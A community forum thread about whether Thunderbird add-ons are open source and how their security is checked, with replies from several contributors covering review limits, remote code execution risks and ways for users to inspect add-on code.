Are all add-ons open source?

Hello, while looking for a suitable add-on for my need, I saw that the permissions of an add-on can be very impactful (access to all emails basically).

So I was wondering how secure the add-ons are.

I was then looking up if all Thunderbird add-ons are open source but didn’t find an answer.

What I noticed was that some add-ons seem to have a link to their source code while others do not (and sharing not much else).

In the add-on I was interested (Simple Template) I saw no reference to its source code.

So I was wondering if I must carefully select open source add-ons or if they all are open source.

If there are closed-source add-ons, how are they validated towards security?

Thank you.

Addons are 3rd party programs made by “random” people all over the world.
Some are open source, some not, some are made by hobby programmers, some by companies, some by malicious actors, some are OK and later sold to malicious actors.

In general, it’s best to assume the worst , especially if you can’t tell if the addon author is a known and credible entity.

Note that even a “link to github” doesn’t mean anything - there is no “proof” the addon submitted to the store is actually built from the source code. A single extra line of code (very long one) can be added to the addon during the build process.

Sadly, Thunderbird doesn’t have the Recommended badges for addons like Firefox, which guarantees the addon and all its updates are always manually reviewed.

Honestly, this is pretty astonishing.

So any add-on could be or turn every day malicious.

And if I understood you right there’s no way for a user to validate that it is not malicious.

I’m just wondering why there’s no policy or systematic to exclude or at least minimize a risk of malicious add-ons.

Well, there are automated checks that “verifies” that the addon looks good.
But there are also ways to hide the real behavior.

Users can also report suspicious addons, but Mozilla addons team is small and can check only a portion of these reports.

In any case, this is something that all 3rd party software stores are facing, and there are no easy solutions.
Check for example this article about Chrome extensions store :

Regarding verifying the extension yourself - you could do that for smaller addons, there is this web-tool build by Mozilla engineer that allows you inspect code of any addon in any store:

But to be 100% safe, you would still have to disable updates.
Luckily, Thunderbird is not often targeted by malicious actors because it’s harder to monetize victims.

This is a very important subject and responsibility certainly in today movement with AI integrated in many softwares while testing code made by it became very important and a security level with high priority.

Our advice for end users is to check addons’ permissions before installing, otherwise @juraj.masiar gave a detailed answer above.

I’m late to this thread, but wanted to share a couple thoughts and provide some direct answers.

@juraj.masiar indirectly touched on this, but I want to be a bit more explicit: “open source” and “secure” are two very different things.

While add-ons aren’t “open source”, you can still pull one apart to see exactly what its doing. Firefox and Thunderbird add-ons are distributed as XPI files (basically renamed ZIP archives) and are built using standard web technologies (HTML, CSS, JS, JSON, etc.). Tools like @rob’s CRX Viewer make it much easier to take a peak inside an extension, but making sense of what’s in there requires some specialized knowledge.

Yes. And while I hate to say this, that’s also true of basically all software.

Mozilla’s Add-ons Policies do prohibit malicious add-ons, but as they say, a law is only as good as it’s enforcement.

As for the question about a systematic way to identify and stop malware… sigh that’s difficult. We can’t even know for sure if a program will ever stop running (commonly referred to as the Halting Problem) let alone whether it will do something bad while it is running.

This is further complicated by the fact that determining maliciousness is subjective and requires context. While most of the time disabling security headers on a website is bad, sometimes that’s exactly what we have to do as developers to identify and fix bugs. If you set up an app on your phone so you know it’s physical location at all times, that’s 100% fine. If you were to install that on someone else’s phone without their knowledge or consent, that’s 100% not fine.

Unfortunately disabling updates also doesn’t keep you 100% safe. Even if, to the best of all of our collective knowledge, a given piece of software is safe when it is released, it may contain a zero-day vulnerability that is later exploited.

In that situation, the best protection is to install security updates as quickly as possible. That’s exactly why browsers have moved over to an “evergreen” model where they automatically update themselves as new updates as the browser vendor releases updates.

Any AppStore basically has security measures implemented which identifies, and excludes malicious apps. Surely the same with Outlook and its add-ons. And aggregators providing software libraries such as pypi.org probably too.

Security breaches may have happened on those platforms but anyhow they surely have measures to minimize the risk.

Can such measures not be unsed for Mozilla add-ons as well?

What I got from this discussion is, that anybody can provide anything as an add-on and there is zero securtiy check.

Perhaps very useful add-ons which have a high reputation could be transferred to a TB maintained add-on, is that an approach?

It’s not that easy, modern malware doesn’t have to contain malware code when submitted to the store.
Instead, it can receive malware commands later on. It’s called “remote code execution”, it’s forbidden, and it’s hard to detect as there is a lot of creative ways to execute javascript code.

In any case, the situation is nicely summarized by one of the Chrome devs under the article I’ve linked:

image876×690 92.6 KB

Note also that Thunderbird has a very small development team, maybe I’m wrong but I think it was only about 15 people, so this is not a huge corporation that could take over bunch of addons and maintain them.

But I’m certain that soon, with modern AI, the automated checks will get much better at flagging “potential malware” before it’s published.

AMO has similar measures.

I see how the discussion might give that impression, but that wasn’t what I was trying to say.

My point was that software distribution platforms can’t guarantee the safety of the software they distribute. It’s impossible to completely eliminate the risk of malware. At the same time, these platforms invest a lot of energy in making sure the software they distribute is as safe as possible despite those challenges. It’s hard to do and they don’t always get it right. As a result, users should be very careful about what software they choose to run on their systems.

Unfortunately, the answer to “how safe is this Thunderbird add-on” comes down to the same kind of answer you’d get for basically any other piece of software: check the reviews and star rating on the store, look for reviews elsewhere, see if anyone has done security a analysis. There’s some amount of safety in using things that larger numbers of people are using because more people will be taking a look at what it’s doing. A better polished user experience often has more developer time and energy put into making sure it’s a good product. But it’s important to be aware that these are just signals and that even big, well respected products can have major security bugs or accidentally ship with malware without the developer’s knowledge.